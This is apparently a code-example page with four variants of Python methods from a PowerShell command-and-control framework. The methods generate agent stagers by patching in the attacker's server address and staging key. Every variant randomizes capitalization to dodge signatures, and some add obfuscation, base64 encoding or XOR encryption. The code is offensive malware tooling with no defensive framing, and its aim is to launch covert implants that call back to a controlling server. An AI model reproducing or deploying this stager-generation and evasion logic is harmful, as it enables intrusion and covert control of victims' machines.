Esempio n. 1
0
    def generate_stager(self,
                        server,
                        key,
                        encrypt=True,
                        encode=False,
                        obfuscate=False,
                        obfuscationCommand=""):
        """
        Generate the PowerShell stager that will perform
        key negotiation with the server and kick off the agent.

        TODO: variable name replacement to change up transport size
                ... other PowerShell obfuscation techniques?
                    http://desktoplibrary.livelink-experts.com/obfuscate-powershell-user-manual ?
        """
        # read in the stager base
        f = open(self.installPath + "/data/agent/stager.ps1")
        stager = f.read()
        f.close()

        # make sure the server ends with "/"
        if not server.endswith("/"): server += "/"

        # patch the server and key information
        stager = stager.replace("REPLACE_SERVER", server)
        stager = stager.replace("REPLACE_STAGING_KEY", key)
        stager = stager.replace("index.jsp", self.stage1)
        stager = stager.replace("index.php", self.stage2)

        randomizedStager = ""

        for line in stager.split("\n"):
            line = line.strip()
            # skip commented line
            if not line.startswith("#"):
                # randomize capitalization of lines without quoted strings
                if "\"" not in line:
                    randomizedStager += helpers.randomize_capitalization(line)
                else:
                    randomizedStager += line

        if obfuscate:
            randomizedStager = helpers.obfuscate(
                randomizedStager,
                self.installPath,
                obfuscationCommand=obfuscationCommand)
        # base64 encode the stager and return it
        if encode:
            return helpers.enc_powershell(randomizedStager)
        elif encrypt:
            # return an encrypted version of the stager ("normal" staging)
            return encryption.xor_encrypt(randomizedStager, key)
        else:
            # otherwise return the case-randomized stager
            return randomizedStager
Esempio n. 2
0
    def generate_stager(self, server, key, encrypt=True, encode=False):
        """
        Generate the PowerShell stager that will perform
        key negotiation with the server and kick off the agent.

        TODO: variable name replacement to change up transport size
                ... other PowerShell obfuscation techniques?
                    http://desktoplibrary.livelink-experts.com/obfuscate-powershell-user-manual ?
        """

        # read in the stager base
        f = open(self.installPath + "/data/agent/stager.ps1".replace('/', os.sep))
        stager = f.read()
        f.close()

        # make sure the server ends with "/"
        if not server.endswith(os.sep): server += "/"

        # patch the server and key information
        stager = stager.replace("REPLACE_SERVER", server)
        stager = stager.replace("REPLACE_STAGING_KEY", key)
        stager = stager.replace("index.jsp", self.stage1)
        stager = stager.replace("index.php", self.stage2)

        randomizedStager = ""

        for line in stager.split("\n"):
            line = line.strip()
            # skip commented line
            if not line.startswith("#"):
                # randomize capitalization of lines without quoted strings
                if "\"" not in line:
                    randomizedStager += helpers.randomize_capitalization(line)
                else:
                    randomizedStager += line

        # base64 encode the stager and return it
        if encode:
            return helpers.enc_powershell(randomizedStager)
        elif encrypt:
            # return an encrypted version of the stager ("normal" staging)
            return encryption.xor_encrypt(randomizedStager, key)
        else:
            # otherwise return the case-randomized stager
            return randomizedStager
Esempio n. 3
0
    def generate_stager_hop(self, server, key, encrypt=True, encode=False):
        """
        Generate the PowerShell stager for hop.php redirectors that
        will perform key negotiation with the server and kick off the agent.
        """

        # read in the stager base
        f = open(self.installPath + "./data/agent/stager_hop.ps1")
        stager = f.read()
        f.close()

        # patch the server and key information
        stager = stager.replace("REPLACE_SERVER", server)
        stager = stager.replace("REPLACE_STAGING_KEY", key)
        hosth = ""
        if self.headers:
            for h in self.headers:
                if 'Host' in h:
                    hosth = h[1]
        stager = stager.replace("REPLACE_HOST", hosth)
        stager = stager.replace("index.jsp", self.stage1)
        stager = stager.replace("index.php", self.stage2)

        randomizedStager = ""

        for line in stager.split("\n"):
            line = line.strip()
            # skip commented line
            if not line.startswith("#"):
                # randomize capitalization of lines without quoted strings
                if "\"" not in line:
                    randomizedStager += helpers.randomize_capitalization(line)
                else:
                    randomizedStager += line

        # base64 encode the stager and return it
        if encode:
            return helpers.enc_powershell(randomizedStager)
        elif encrypt:
            # return an encrypted version of the stager ("normal" staging)
            return encryption.xor_encrypt(randomizedStager, key)
        else:
            # otherwise return the case-randomized stager
            return randomizedStager
Esempio n. 4
0
    def generate_stager_hop(self, server, key, encrypt=True, encode=True):
        """
        Generate the PowerShell stager for hop.php redirectors that 
        will perform key negotiation with the server and kick off the agent.
        """

        # read in the stager base
        f = open(self.installPath + "./data/agent/stager_hop.ps1")
        stager = f.read()
        f.close()

        # patch the server and key information
        stager = stager.replace("REPLACE_SERVER", server)
        stager = stager.replace("REPLACE_STAGING_KEY", key)
        stager = stager.replace("index.jsp", self.stage1)
        stager = stager.replace("index.php", self.stage2)

        randomizedStager = ""

        for line in stager.split("\n"):
            line = line.strip()
            # skip commented line
            if not line.startswith("#"):
                # randomize capitalization of lines without quoted strings
                if "\"" not in line:
                    randomizedStager += helpers.randomize_capitalization(line)
                else:
                    randomizedStager += line
        
        # base64 encode the stager and return it
        if encode:
            return helpers.enc_powershell(randomizedStager)
        elif encrypt:
            # return an encrypted version of the stager ("normal" staging)
            return encryption.xor_encrypt(randomizedStager, key)
        else:
            # otherwise return the case-randomized stager
            return randomizedStager